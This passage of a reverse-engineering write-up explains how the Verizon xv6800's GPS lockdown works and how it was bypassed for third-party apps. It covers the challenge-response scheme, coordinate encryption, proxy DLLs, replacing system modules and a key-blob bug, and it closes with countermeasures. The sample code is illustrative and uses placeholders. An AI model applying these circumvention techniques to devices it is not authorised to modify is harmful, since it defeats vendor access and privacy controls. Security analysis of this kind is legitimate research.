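#define SSD_LEN       0x10  /* session blob size, per the oGPSGetBaseSSD comment */
#define CHALLENGE_MAX 0x1c  /* maximum challenge size, per oGPSReadSecurityConfig */
#define RESPONSE_LEN  0x1c  /* response size, per oGPSWriteSecurityConfig */

/* Hypothetical callback table standing in for the oemgpsOne.dll exports. */
struct gps_ops {
    int (*wait_for_challenge)(void *ctx);  /* 0 = challenge event signaled */
    int (*read_challenge)(void *ctx, unsigned char *buf);
    int (*write_response)(void *ctx, const unsigned char *buf);
};

/* Placeholder only: the real bit-shuffle and SHA-1 step is not reproduced. */
void placeholder_transform(const unsigned char *challenge,
                           const unsigned char *ssd, unsigned char *response)
{
    size_t i;

    for (i = 0; i < RESPONSE_LEN; i++)
        response[i] = (unsigned char)(challenge[i] ^ ssd[i % SSD_LEN]);
}

/* Services challenges until the wait fails; returns cycles done, or -1. */
int run_challenge_loop(const struct gps_ops *ops, void *ctx,
                       const unsigned char *ssd)
{
    unsigned char challenge[CHALLENGE_MAX];
    unsigned char response[RESPONSE_LEN];
    int cycles = 0;

    while (ops->wait_for_challenge(ctx) == 0) {
        if (ops->read_challenge(ctx, challenge) != 0)
            return -1;
        placeholder_transform(challenge, ssd, response);
        if (ops->write_response(ctx, response) != 0)
            return -1;
        cycles++;
    }
    return cycles;
}

/* Simulated driver, used only to exercise the loop. */
struct fake_driver {
    int pending;                        /* challenges still to be issued */
    int accepted;                       /* responses accepted so far */
    unsigned char ssd[SSD_LEN];         /* session blob the driver expects */
    unsigned char last[CHALLENGE_MAX];  /* most recent challenge issued */
};

int fake_wait(void *ctx)
{
    struct fake_driver *d = ctx;
    return d->pending > 0 ? 0 : 1;
}

int fake_read(void *ctx, unsigned char *buf)
{
    struct fake_driver *d = ctx;

    memset(d->last, 0x40 + d->pending, CHALLENGE_MAX);
    memcpy(buf, d->last, CHALLENGE_MAX);
    d->pending--;
    return 0;
}

int fake_write(void *ctx, const unsigned char *buf)
{
    struct fake_driver *d = ctx;
    unsigned char expected[RESPONSE_LEN];

    placeholder_transform(d->last, d->ssd, expected);
    if (memcmp(buf, expected, RESPONSE_LEN) != 0)
        return 1;  /* wrong response: reject */
    d->accepted++;
    return 0;
}

const struct gps_ops fake_ops = { fake_wait, fake_read, fake_write };
```

On the device, the wait callback would presumably block on the event handle
passed to oGPSEnableSecurity, and the read and write callbacks would forward
to oGPSReadSecurityConfig and oGPSWriteSecurityConfig respectively.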
||||
2.1.b. Location Information Encryption

Without passing the challenge-response scheme previously described, the GPS
intermediate driver will refuse to return a set of position information from
the gpsOne hardware. Even after the challenge-response system has been
implemented, however, a secondary layer of security must be addressed. This
security layer takes the form of the encryption of the latitude and longitude
values returned by the gpsOne chipset.

While this second layer of security may appear superfluous at first glance,
there exists a valid reason for it. Recall that the GPS intermediate driver
multiplexes a single piece of GPS hardware across multiple applications. In
the implementation of the current GPS intermediate driver for the xv6800, the
challenge-response scheme appears to map directly to the gpsOne chipset itself.

Thus, once a single program has passed the challenge-response mechanism, and as
long as that program continues to respond correctly to challenge-response
requests, any program on the system can call any of the standard Windows Mobile
GPS interfaces to retrieve location data. This presents the obvious security
hole wherein a Verizon Wireless-approved GPS application is started, and then a
third-party application using the standard Windows Mobile GPS API is loaded,
in effect "piggy-backing" on top of the challenge-response code residing in the
approved application to allow access to the embedded gpsOne hardware.

For reasons unclear to the author, the designers of the GPS lockdown system
did not choose to simply disable GPS requests not associated with the program
that has passed the challenge-response scheme. Instead, a different approach
is taken, such that the GPS intermediate driver encrypts the location
information that it returns via either the serial port or gpsapi.dll
interfaces.

In order to make sense of the returned latitude and longitude values, a program
must be able to decrypt them. While the GPS intermediate driver provides the
decryption key in plaintext-equivalent form to any program that knows how to
request it, this information is not available to clients of the standard
Windows Mobile NMEA-compatible virtual serial port or gpsapi.dll interfaces.
Aside from latitude and longitude data, however, all other information returned
by the standard Windows Mobile GPS interface is unadulterated and valid (this
includes altitude and timing information, primarily).

Thus, the first step to decoding valid position values is to call an extended
version of the standard Windows Mobile GPSGetPosition routine [6]. This
extended routine is named oGPSGetPosition, and it, too, is implemented in
oemgpsOne.dll. The prototype matches that of the standard GPSGetPosition,
although an extended version of the GPS_POSITION structure containing
additional information (including a blob needed to derive the decryption key
required to decrypt the longitude and latitude values) is returned.

DWORD
oGPSGetPosition(
    __in HANDLE Device,
    __out PGPS_POSITION GPSPosition,
    __in DWORD MaximumAge,
    __in DWORD Flags
    );

Decryption of the latitude and longitude information is fairly
straightforward, involving a transform (via the same transformation process
described previously) of the challenge data returned as a part of the extended
GPS_POSITION structure. This yields an AES key, which is imported into a
CryptoAPI key object, and then used in ECB mode to decrypt the latitude and
longitude values.

Once decryption is complete, a scaling factor is then applied to the resultant
coordinate values, in order to bring them in line with the unit system used by
the standard Windows Mobile GPS interfaces.
|
||||
2.2.b. VZ Navigator (Application-level) Protection Mechanisms

While many parts of the GPS lockdown system are implemented by radio
firmware-level or kernel mode-level code, portions are also implemented in
user mode. An approved Verizon Wireless application accesses location
information by calling through a module developed by Verizon Wireless and
Autodesk, named LBSDriver.dll. In an approved application, it is the
responsibility of LBSDriver.dll to communicate with the GPS intermediate driver
via oemgpsOne.dll, and implement the challenge-response and position decryption
functionality. LBSDriver.dll then exports a subset of the standard Windows
Mobile gpsapi.dll (with several custom additions), for usage by approved
programs on the xv6800.

Additionally, LBSDriver.dll implements a user-controlled privacy policy on top
of the gpsOne hardware. The user is allowed to specify at what times of day a
particular program can access location information, and whether the user is
prompted to confirm the request. The privacy policy configuration process is
driven via a dialog box (implemented and created by LBSDriver.dll) that is
shown on the device the first time an application runs, and subsequently via
a Verizon Wireless-operated web site [7]. Privacy policy settings are
obfuscated and stored in the registry, keyed off of a hash of the calling
program's main process image fully-qualified filename.
|
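The time-of-day and confirmation settings described above amount to a small
decision function. The following is a minimal sketch of such a check, assuming
a hypothetical gps_policy layout; the actual registry format used by
LBSDriver.dll is obfuscated and is not reproduced here, and treating an empty
window as "all day" is an arbitrary choice made for the example.

```c
enum gps_decision { GPS_DENY = 0, GPS_ALLOW = 1, GPS_PROMPT = 2 };

/* Hypothetical per-program policy; the real registry format is obfuscated. */
struct gps_policy {
    int start_minute;  /* window start, minutes after midnight (0..1439) */
    int end_minute;    /* window end, exclusive; may be less than start */
    int prompt_user;   /* nonzero if the user must confirm each request */
};

/* Returns 1 if minute falls inside [start, end), allowing midnight wrap. */
int in_window(const struct gps_policy *p, int minute)
{
    if (p->start_minute == p->end_minute)
        return 1;  /* treated here as "all day" */
    if (p->start_minute < p->end_minute)
        return minute >= p->start_minute && minute < p->end_minute;
    /* Window spans midnight, e.g. 22:00 to 06:00. */
    return minute >= p->start_minute || minute < p->end_minute;
}

/* Combines the time window with the confirmation setting. */
enum gps_decision evaluate_policy(const struct gps_policy *p, int minute)
{
    if (!in_window(p, minute))
        return GPS_DENY;
    return p->prompt_user ? GPS_PROMPT : GPS_ALLOW;
}
```

Because a check of this kind runs entirely on the client, it only constrains
programs that choose to call through the module that implements it.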
||||
Because LBSDriver.dll is a standard, loadable DLL, it is vulnerable to being
loaded by untrusted code. There are several defenses implemented by the
LBSDriver module which attempt to deter third-party programs that have not been
approved by Verizon Wireless from successfully loading LBSDriver.dll and
subsequently using it to access location information.

The first such protection embedded into LBSDriver.dll is a digital signature
check on the main process executable corresponding to any program that attempts
to load LBSDriver.dll. This check is ultimately triggered when the
GPSOpenDevice export of LBSDriver.dll is called. Specifically, the calling
process module is confirmed to be signed by a custom certificate. If this is
not the case, then an error dialog is shown, and the GPSOpenDevice request is
denied. This check is based on calling GetModuleFileName(NULL, ...) [8] to
retrieve the path to the main process image, which is then run through the
aforementioned signature check.

Additionally, LBSDriver.dll connects to an Autodesk-operated server in order to
determine if the calling program is authorized to use LBSDriver.dll. In
addition to verifying that the calling program is approved as a GPS-enabled
application, the Autodesk-operated server also appears to indicate back to the
client whether or not the user's account has been provisioned for a
subscription location-enabled application, such as VZ Navigator. A program
hoping to utilize LBSDriver.dll must pass these checks in order to successfully
acquire a location fix using the built-in gpsOne hardware.

The Autodesk-operated server also provides configuration information (such as
Position Determining Entity (PDE) addresses) that is later used in the assisted
GPS process. However, this configuration information appears to be more or
less static, at least for the critical portions necessary to enable assisted
GPS, and can thus be cached and reused by third-party programs without even
needing to go through the Autodesk server.
|
||||
3. Opening gpsOne on the xv6800 to Third-party Applications.

Understanding the protection mechanisms that implement the locking down of the
built-in GPS hardware is only part of the battle to enable third-party
GPS-enabled programs to operate on the xv6800. Undocumented functions in
oemgpsOne.dll with no equivalent in the standard Windows Mobile gpsapi.dll, and
various quirks of Windows Mobile itself, preclude a straightforward
implementation to unlock the GPS for third-party programs.

Furthermore, third-party GPS-enabled programs are written to one (or commonly,
both) of the standard Windows Mobile GPS interfaces. Because these interfaces
are disabled on the xv6800, a solution to adapt third-party programs to the
locked down GPS interface would be required (in lieu of modifying every single
third-party application to support the locked down GPS interface). As many of
these third-party applications are closed-source and frequently updated, any
solution that required direct modification of a third-party program would be
untenable from a maintenance perspective.

The solution chosen was to write an emulation layer for the standard Windows
Mobile gpsapi.dll interface, which translates standard gpsapi.dll function
calls into requests compatible with the locked down GPS interface.
|
||||
3.1. Examining gpsOne Driver Interactions

The first step in implementing a layer to unlock the gpsOne hardware on the
xv6800 involves discovering the correct sequence of oemgpsOne.dll calls (and
thus calls to the GPS intermediate driver, as oemgpsOne.dll is, with some minor
exceptions, merely a thin wrapper around IOCTL requests to the GPS intermediate
driver).

The standard way that this would be done on a Windows-based system would be to
run VZ Navigator under a debugger, but there exist several complications that
prevent this from being an acceptable solution for monitoring oemgpsOne.dll
requests.

First, the assisted GPS functionality of the gpsOne hardware requires that the
device be connected to the cellular network, and operating with it as the
default gateway, as a connection to a carrier-supplied server (known as a
"Position Determining Entity", or PDE) must be made. The PDE servers that are
operated by Verizon Wireless are firewalled off from outside their network, and
in addition, it is possible that they use the IP address assigned to the
requesting user for location assistance purposes.

Unfortunately, all of the Windows Mobile debuggers that the author had access
to (IDA Pro 5.1 and the Visual Studio 2005 debugger) require an ActiveSync
link for the debugger connection to a Windows Mobile-based device. While the
ActiveSync link is enabled, it supersedes the cellular link for data traffic.
Even when the computer on the other end of the ActiveSync link was connected to
the cellular network via a separate cellular modem, the GPS functionality did
not operate, due to an apparent check of whether the cellular link is the
highest-precedence data link on the device.

This means that observing many of the oemgpsOne.dll calls relating to position
fixes would not be possible with the standard debugging tools available. The
solution that was implemented for this problem was to write a proxy DLL that
exports every symbol exported by oemgpsOne.dll, logs the parameters of any such
API calls, and then forwards them on to the underlying oemgpsOne.dll
implementation (logging return values and out parameters after the actual
implementation function in question returned).
|
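The log, forward, and log-again pattern used by such a proxy can be sketched
in portable C as follows. This is not the proxy module that was actually
written; it is a minimal illustration for a single export. The dword_t
typedef, the in-memory log buffer (a file would be used on the device),
proxy_attach, and stub_read_config are all assumptions introduced for the
example, and the prototype follows the rough oGPSReadSecurityConfig prototype
given earlier in this article.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

typedef unsigned long dword_t;  /* stand-in for DWORD */
typedef dword_t (*read_config_fn)(void *device, unsigned char *buf);

static read_config_fn real_read_config;  /* the genuine implementation */
static char proxy_log[512];              /* in-memory log for illustration */
static size_t proxy_log_len;

/* Appends one formatted entry to the log, truncating if the buffer fills. */
static void proxy_logf(const char *fmt, ...)
{
    size_t room = sizeof(proxy_log) - 1 - proxy_log_len;
    va_list ap;
    int n;

    if (room == 0)
        return;
    va_start(ap, fmt);
    n = vsnprintf(proxy_log + proxy_log_len, room + 1, fmt, ap);
    va_end(ap);
    if (n > 0)
        proxy_log_len += ((size_t)n < room) ? (size_t)n : room;
}

/* On the device, this pointer would be resolved from the real DLL. */
void proxy_attach(read_config_fn real)
{
    real_read_config = real;
}

const char *proxy_log_text(void)
{
    return proxy_log;
}

/* Proxy for one export: log inputs, forward the call, log outputs. */
dword_t proxy_oGPSReadSecurityConfig(void *device, unsigned char *buf)
{
    dword_t status;

    proxy_logf("oGPSReadSecurityConfig(device=%p)\n", device);
    status = real_read_config(device, buf);
    proxy_logf("  -> status=%lu buf=%02x %02x %02x %02x\n", status,
               (unsigned)buf[0], (unsigned)buf[1],
               (unsigned)buf[2], (unsigned)buf[3]);
    return status;
}

/* Stand-in for the real export, used only to exercise the proxy. */
dword_t stub_read_config(void *device, unsigned char *buf)
{
    (void)device;
    buf[0] = 0x01; buf[1] = 0x02; buf[2] = 0x03; buf[3] = 0x04;
    return 0;
}
```

Logging the out parameters only after the forwarded call returns is what makes
arguments whose meaning is unclear from static disassembly easy to identify.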
||||
While potentially labor-intensive, in terms of creating the proxy DLL, such a
technique is relatively simple on Windows. The usual procedure for such a task
would be to create the proxy DLL, place it in the directory containing the main
process image of the program to be hooked, and then load the real DLL with a
fully-qualified path name from inside the proxy DLL.

Unfortunately, Windows Mobile does not allow two DLLs with the same base name
to be loaded, even if a fully-qualified path is specified with a call to
LoadLibrary. Instead, the first DLL that happened to get loaded by any process
on the entire system matching the requested base name is returned. This means
that in order to load a proxy DLL, one of two approaches would need to be
taken.

The first such option is to rename the proxy DLL itself, along with the
filename of the imported DLL in the desired target module, by modifying the
target module itself on disk. The second option is to rename the DLL
containing the implementation of the proxied functionality, and then load that
DLL by the altered name in the proxy DLL. Both approaches are functionally
equivalent on Windows Mobile; the author chose the former in this case.
|
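The loader behavior described above can be modeled with a few lines of
portable C. This is a toy model of the observed behavior, not the Windows
Mobile loader: the module_table structure and model_load_library are
hypothetical names, and the case-insensitive comparison of base names is an
assumption made for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAX_MODULES 16

/* Toy model of a system-wide list of loaded modules. */
struct module_table {
    const char *paths[MAX_MODULES];  /* path each module was first loaded from */
    size_t count;
};

/* Returns the part of the path after the last backslash. */
const char *base_name(const char *path)
{
    const char *slash = strrchr(path, '\\');
    return slash ? slash + 1 : path;
}

/* Case-insensitive string comparison; returns 1 on a match. */
static int names_equal(const char *a, const char *b)
{
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == *b;
}

/*
 * Models the behavior described above: if a module with the same base name
 * is already loaded, it is returned regardless of the path requested.
 * Returns NULL only if the table is full.
 */
const char *model_load_library(struct module_table *t, const char *path)
{
    size_t i;

    for (i = 0; i < t->count; i++)
        if (names_equal(base_name(t->paths[i]), base_name(path)))
            return t->paths[i];
    if (t->count == MAX_MODULES)
        return NULL;
    t->paths[t->count++] = path;
    return path;
}
```

In this model, a second oemgpsOne.dll requested by full path resolves to the
copy that was loaded first, whereas a proxy with a distinct base name (such as
oemgpsOneProxy.dll) is loaded as a separate module.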
||||
Through disassembly, a rough estimate of the prototypes of the various APIs
exported by oemgpsOne.dll was created, and from there, a proxy module
(oemgpsOneProxy.dll) was written to log specific API calls to a file for later
analysis. This approach allowed for relatively quick identification of any
arguments to oemgpsOne.dll calls which were not immediately obvious from static
disassembly, despite the lack of a debugger on the target when many of the
calls were made.
|
||||
3.2. Implementing a Custom oemgpsOne.dll client

After discerning the prototypes for the various oemgpsOne.dll supporting APIs,
the next step in unlocking the built-in GPS hardware on the xv6800 was to write
a custom client program that utilized oemgpsOne.dll to retrieve decrypted
location values from the gpsOne chipset.

Although one approach to this task might be to attempt to disable the various
security checks present in LBSDriver.dll, it was deemed easier to re-implement
an oemgpsOne.dll client from scratch. In addition, this approach also allowed
the author to circumvent various implementation bugs and limitations present
in LBSDriver.dll.

Given the information gleaned from analyzing LBSDriver.dll's implementation of
the challenge-response and GPS decryption logic, and the API call logging from
the oemgpsOne.dll proxy module, writing a client for oemgpsOne.dll is merely an
exercise in writing the necessary code to connect all of the pieces together in
the correct fashion.

After valid GPS position data can be retrieved from oemgpsOne.dll, all that
remains is to write an adapter layer to connect programs written against the
standard Windows Mobile gpsapi.dll to the custom oemgpsOne.dll client.

However, there are inherent design limitations in the locked down GPS interface
that complicate the creation of a practical adapter to convert gpsapi.dll calls
into oemgpsOne.dll calls. For example, a naive implementation that might
involve creating a module to replace gpsapi.dll with a custom binary to make
inline calls to oemgpsOne.dll would run afoul of a number of pitfalls.

Specifically, as oemgpsOne.dll depends on gpsapi.dll, attempting to simply
replace gpsapi.dll with a custom module will break the very oemgpsOne.dll
functionality used to communicate with the GPS intermediate driver, due to
the previously mentioned "one DLL for a given base name" Windows Mobile
limitation. In addition, it is not possible for two programs to simultaneously
operate as full clients of oemgpsOne.dll, as the challenge-response mechanism
operates globally and will not operate correctly should two applications
simultaneously attempt to engage it.

The most straightforward solution to the former issue is to simply rename a
copy of the stock gpsapi.dll, and then modify oemgpsOne.dll to refer to the
renamed gpsapi.dll. This opens the door to replacing the system-supplied
gpsapi.dll with a custom replacement gpsapi.dll implementing a client for
oemgpsOne.dll.
|
||||
3.3. Multiplexing GPS Across Multiple Applications.

The GPS intermediate driver supports multiplexing the GPS hardware present on
a Windows Mobile-based device across multiple applications. However, as
previously noted, the locked down GPS interface breaks this functionality, as
no two programs can participate in the full challenge-response protocol for
keeping the gpsOne hardware active simultaneously.

Although the first program to start could be designated the "master", and thus
be responsible for challenge-response operations (with secondary programs
merely decrypting position data locally), this introduces a great deal of extra
complexity. Specifically, significant coordination issues arise relating to
cleanly handling the fact that third-party GPS-enabled programs are typically
unaware of each other. Thus, work must be done to handle the case where one
program, having previously activated the gpsOne hardware, exits, leaving any
remaining programs still using GPS with the problem of selecting a new "master"
program to perform challenge-responses with the GPS intermediate driver.

Given the difficulties of such an approach, a different model was chosen, such
that the replacement gpsapi.dll acts as a client of a server program which then
mediates access to the locked down GPS interface on behalf of all active
GPS-enabled programs. Although there exist synchronization and coordination
issues with this model, they are simpler to deal with than the alternative
implementation.
|
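The bookkeeping at the heart of such a server can be sketched as a reference
count around a single driver session. The following is a minimal sketch under
assumed names (gps_broker and its functions are hypothetical, and no
inter-process transport or locking is shown); it is not the server that was
actually implemented. Its purpose is to show why no "master" election is
needed: the driver session belongs to the server, not to any one client.

```c
#include <stddef.h>

/* Hypothetical broker state; names are illustrative only. */
struct gps_broker {
    int clients;          /* programs currently attached */
    int session_active;   /* nonzero while the broker owns the driver session */
    int sessions_opened;  /* number of times the driver session was started */
    int have_fix;         /* nonzero once a decrypted position is cached */
    double latitude;
    double longitude;
};

void broker_init(struct gps_broker *b)
{
    b->clients = 0;
    b->session_active = 0;
    b->sessions_opened = 0;
    b->have_fix = 0;
    b->latitude = 0.0;
    b->longitude = 0.0;
}

/* A client opens GPS: only the first one starts the driver session. */
void broker_attach(struct gps_broker *b)
{
    if (b->clients++ == 0) {
        b->session_active = 1;  /* open device, begin challenge-response */
        b->sessions_opened++;
    }
}

/* A client closes GPS: only the last one tears the session down. */
void broker_detach(struct gps_broker *b)
{
    if (b->clients > 0 && --b->clients == 0) {
        b->session_active = 0;
        b->have_fix = 0;
    }
}

/* Called by the broker after it has decrypted a new position. */
void broker_publish(struct gps_broker *b, double lat, double lon)
{
    if (!b->session_active)
        return;
    b->latitude = lat;
    b->longitude = lon;
    b->have_fix = 1;
}

/* Called on behalf of a client; returns 1 and fills outputs if a fix exists. */
int broker_read(const struct gps_broker *b, double *lat, double *lon)
{
    if (!b->have_fix)
        return 0;
    *lat = b->latitude;
    *lon = b->longitude;
    return 1;
}
```

A client exiting in this model simply decrements the count; the remaining
clients are unaffected because the challenge-response state never lived in
the departing process.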
||||
3.4. Caveats.

While the resultant GPS adapter system supports third-party programs that
utilize gpsapi.dll, any programs using the virtual NMEA serial port interface
will not operate successfully. Unfortunately, the approach used to replace
gpsapi.dll is not feasible for the APIs used to communicate with a serial
port, by virtue of the sheer number of function calls present in coredll.dll
that would need to be forwarded on to the real coredll.dll via a proxy module.
|
||||
4. Bugs in the Verizon Wireless xv6800 gpsOne Lock Down Logic

Few programs designed to lock down portions of a system via security through
obscurity are bug-free, and the GPS lockdown logic on the xv6800 is certainly
no exception. The lockdown code has a number of localized and systemic issues
pervading the current implementation.

4.1. Thread Safety Issues

There are a number of threading-related issues present throughout the locked
down GPS interface.

- The GPS intermediate driver does not properly synchronize the case of
  multiple simultaneous callers using the extended IOCTLs not present on a
  stock GPS intermediate driver implementation.
- LBSDriver.dll utilizes a dedicated thread for performing challenge-response
  processing with the GPS intermediate driver. However, there is no
  synchronization provided between the challenge-response thread and the thread
  that retrieves and decrypts GPS position data, leading to a race condition in
  which it might be possible for decryption to return garbage data.
|
||||
4.2. API Mis-use

In several cases, LBSDriver.dll fails to use standard Windows APIs correctly.

- LBSDriver.dll performs dangerous operations in DllMain, such as loading
  other DLLs, despite such operations being long-documented as blatantly
  illegal and prone to difficult-to-diagnose deadlocks (particularly on a
  device with extremely limited debugging support).
- When LBSDriver.dll performs the AES decryption on the latitude/longitude
  values returned by oemgpsOne.dll, it creates a CryptoAPI key blob, in order
  to import the derived AES key into a CryptoAPI key object (via the use of the
  CryptImportKey routine). However, the length of the key blob passed to
  CryptImportKey is actually too short. This would appear to make
  LBSDriver.dll dependent on a bug in the Windows Mobile 6 implementation of
  CryptoAPI. Specifically, the key blob format for a symmetric key includes a
  count in bytes of key material, and the data passed to CryptImportKey is
  such that the key blob structure claims to extend beyond the number of bytes
  that LBSDriver.dll specifies for the key blob structure itself. It might
  even be the case that this represents a security problem in CryptoAPI due to
  apparently non-functional length checking in this case, as key blobs are
  documented to be transportable across an untrusted medium.

To illustrate the second issue, consider the following code fragment:

//
// Initialize the header.
//

BlobHeader = (BLOBHEADER *)KeyBlob;

BlobHeader->bType    = PLAINTEXTKEYBLOB;
BlobHeader->bVersion = 2;
BlobHeader->reserved = 0;
BlobHeader->aiKeyAlg = CALG_AES_128;

//
// Initialize the key length in the BLOB payload.
//

*(DWORD *)(&KeyBlob[ 0x08 ] ) = KeyLength;

//
// Initialize the key material in the BLOB payload.
//

memcpy( KeyBlob + 0x0C, KeyData, KeyLength );

//
// Generate a CryptoAPI AES-128 key object from our key material.
//

if (!CryptImportKey(
    CryptProv,
    KeyBlob,
    KeyLength, // BUGBUG: Should really be KeyLength + 0x0C...
    NULL,
    0,
    &Key))
{
    break;
}

Contrary to the Microsoft-supplied documentation [9] for CryptImportKey, the
third parameter passed to CryptImportKey ("dwDataLen", as "KeyLength" in this
example) is too short for the key blob specified, as the length field in the
blob header itself describes the key material as being "KeyLength" bytes.
Thus, the LBSDriver.dll module would appear to depend upon either CryptoAPI or
the default Microsoft cryptographic provider on Windows Mobile not validating
blob header key material lengths properly, as the supplied blob header claims
that the key material extends outside the provided blob buffer (given the
length passed to CryptImportKey).

Microsoft-supplied sample code [10] illustrates the correct construction of a
symmetric key blob, and does not suffer from this deficiency.
|
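The length mismatch in the fragment above can be made concrete with a small,
self-contained check. The sketch below is not CryptoAPI's validation logic; it
only mirrors the layout used in the fragment (an 8-byte header, a 4-byte key
length at offset 0x08, and key material at offset 0x0C) and shows the kind of
bounds check that the passed-in length would be expected to satisfy. All
function names are hypothetical, and the header fields are left zeroed because
only the lengths matter for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BLOB_HEADER_LEN 0x08  /* BLOBHEADER occupies offsets 0x00..0x07 */
#define BLOB_KEY_OFFSET 0x0C  /* key material follows the 4-byte length */

/* Total bytes a plaintext key blob occupies for a key of key_len bytes. */
size_t plaintext_blob_size(size_t key_len)
{
    return BLOB_KEY_OFFSET + key_len;
}

/* Writes the length field and key material; returns the full blob size. */
size_t build_blob(unsigned char *blob, const unsigned char *key,
                  uint32_t key_len)
{
    memset(blob, 0, BLOB_HEADER_LEN);  /* header fields omitted here */
    memcpy(blob + BLOB_HEADER_LEN, &key_len, sizeof key_len);
    memcpy(blob + BLOB_KEY_OFFSET, key, key_len);
    return plaintext_blob_size(key_len);
}

/* Returns 1 if the key material claimed by the blob fits inside data_len. */
int blob_length_is_consistent(const unsigned char *blob, size_t data_len)
{
    uint32_t claimed;

    if (data_len < BLOB_KEY_OFFSET)
        return 0;
    memcpy(&claimed, blob + BLOB_HEADER_LEN, sizeof claimed);
    return claimed <= data_len - BLOB_KEY_OFFSET;
}
```

For a 16-byte AES-128 key, the blob occupies 0x0C + 16 = 28 bytes. Passing 16
as the data length, as the fragment above effectively does, fails this check,
while passing 28 satisfies it.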
||||
5. Suggested Countermeasures

Although several attempts were made throughout the GPS lockdown system on the
xv6800 to deter third party programs from successfully communicating with the
integrated gpsOne hardware, the bulk of these checks were relatively easy to
overcome. In fact, the principal barriers to the GPS unlocking project were
a lack of viable debugging tools for the platform, and an unfamiliarity with
Windows Mobile on the part of the author.

Nevertheless, several changes could have been made to improve the resilience
of the lockdown system.

- Deny assisted GPS availability at the PDE if the user's account is not
  provisioned for GPS, or if the time-of-day restrictions configured in the
  privacy policy are not met. Because the security and lockdown checks are
  implemented client-side on the xv6800, they are relatively easily bypassable
  by third party applications. However, if the device is capable of performing
  a standalone GPS location fix, blocking assisted GPS access will not provide
  a hard defense.
- Require code signing from a Verizon Wireless CA for all applications loaded
  on the device. Users are, however, unlikely to purchase a device configured
  in such a manner, as expensive smartphone-class devices are often sold under
  the expectation that third party programs will be easily loadable.
- Move enforcement checks for operations such as time of day requirements for
  the user's desired location privacy policy into the radio firmware and out of
  the operating system environment. The radio firmware environment is
  significantly closer to a "black box" than the operating system which runs on
  the application core of the xv6800. Furthermore, if the software loader on
  the xv6800 were secured and locked down, the radio firmware could be made
  significantly more resistant to unauthorized modifications. One could
  envision a system wherein the radio firmware communicates with the carrier's
  network out-of-band (with respect to the general-purpose operating system
  loaded on the device) to determine when it had been authorized by the user to
  provide location information to applications running on the device.

The client-side checks on the GPS lockdown system are likely a legacy of the
fact that VZ Navigator and LBSDriver.dll appear to be more or less ports from
BREW-based "dumb phones", where the application environment is more tightly
controlled by code signing requirements. The Windows Mobile operating
environment is significantly different in this respect, however.

Additionally, the author would submit that, from the perspective of attempting
to safeguard users from unauthorized harvesting of their location data (a key
reason cited by Verizon Wireless with respect to the certification process
needed for an application to become approved for location-aware functionality),
a hardware switch to enable or disable the GPS hardware on the device would be
a far better investment. In fact, the xv6800 already possesses a hardware
switch for 802.11 functionality; if this were instead changed to enable or
disable the gpsOne chipset in future smartphone designs, users could be assured
that their location information would be truly secure.
|
||||
6. Debugging and Development Challenges on Windows Mobile and the xv6800.

Windows Mobile has a severely reduced set of standard debugging tools compared
to the rich debugging environment typically available on most Windows-derived
systems. This greatly complicated the process of understanding the underlying
implementation details of the GPS lockdown system.

The author had access to two debuggers that could be used on the xv6800 at the
time of this writing: the Visual Studio 2005 debugger, and the IDA Pro 5.1
debugger. Both programs have serious issues of their own.

Unfortunately, there does not appear to be any support for WinDbg, the author's
preferred debugging tool, when using Windows CE-based systems, such as Windows
Mobile. Although WinDbg can open ARM dump files (and ARM PE images as a dump
file), and can disassemble ARM instructions, there is no transport to connect
it to a live process on an ARM system.

The relatively immature state of debugging tools for the Windows Mobile
platform consumed a significant amount of time over the course of this project.
|
||||
6.1. Limitations of the Visual Studio Debugger

Visual Studio 2005 has integrated support for debugging Windows Mobile-based
applications. However, this support is riddled with bugs, and the quality of
the debugging experience rapidly diminishes if one does not have symbols and
binaries for all images in the process being debugged present on the debugger
machine. In particular, the Visual Studio 2005 debugger seems to be unable to
disassemble at any location other than the current pc register value without
having symbols for the containing binary available. (In the author's
experience, attempting such a feat will fail with a complaint that no code
exists at the desired address.)

Additionally, there seems to be no support for export symbols on the Windows
Mobile debugger component of Visual Studio 2005. This, coupled with the lack
of freely-targetable disassembly support, often made it difficult to identify
standard API calls from the debugger. The author recommends falling back to
static disassembly whenever possible, as available static disassembly tools,
such as IDA Pro 5.1 Advanced or WinDbg, provide a superior user experience.

6.2. Limitations of the IDA Pro 5.1 Debugger

Although IDA Pro 5.1 supports debugging of Windows Mobile-based programs, the
debugger has several limitations that made it unfortunately less practical than
the Visual Studio 2005 debugger. Foremost, it would appear that the debugger
does not support suspending and breaking into a Windows Mobile target without
the Windows Mobile target voluntarily breaking in (such as by hitting a
previously defined breakpoint).

In addition, the default security policy configuration on the device needed to
be modified in order to enable the debugger to connect at all (see note [3]).
|
||||
6.3. Replacing a Firmware-baked Execute-in-place Module
|
||||
|
||||
Windows Mobile supports the concept of an execute in place (or XIP) module.
|
||||
Such an executable image is stored split up into PE sections on disk (and does
|
||||
not contain a full image header). XIP modules are "baked" into the firmware
|
||||
image, and cannot be overwritten without flashing the OS firmware on the
|
||||
device. Conversely, it is not possible to simply copy an XIP module off of the
|
||||
device and on to a conventional storage medium.
|
||||
|
||||
The advantage of XIP "baked" modules comes into play when one considers the
|
||||
limited amount of RAM available on a typical Windows Mobile device. XIP
|
||||
modules are pre-relocated to a guaranteed available base address, and do not
|
||||
require any runtime alterations to their backing memory when mapped. As a
|
||||
result, XIP modules can be backed entirely by ROM and not RAM, decreasing the
|
||||
(scarce) RAM that must be devoted to holding executable code.
|
||||
|
||||
It is possible to supersede an XIP "baked" module without flashing the OS image
|
||||
on the xv6800, however. This involves a rather convoluted procedure, which
|
||||
amounts to the following steps, for a given XIP module residing in a particular
|
||||
directory:
|
||||
|
||||
- First, rename the replacement module such that it has a filename which does
|
||||
not conflict with any files present in the directory containing the XIP
|
||||
module to supersede.
|
||||
- Next, copy the renamed replacement module into the directory containing the
|
||||
desired XIP module to supersede.
|
||||
- Finally, rename the replacement module to have the same filename as the
|
||||
desired XIP module.
|
||||
|
||||
Deleting the filename associated with the superseded XIP module will revert the
|
||||
device back to the ROM-supplied XIP module. This property proves beneficial in
|
||||
that it becomes easy to revert back to stock operating system-supplied modules
|
||||
after temporarily superseding them.
|
||||
|
||||
6.4. Import Address Table Hooking Limitations
|
||||
|
||||
One avenue considered during the development of the replacement gpsapi.dll
|
||||
module was to hook the import address tables (IATs) of programs utilizing
|
||||
gpsapi.dll.
|
||||
|
||||
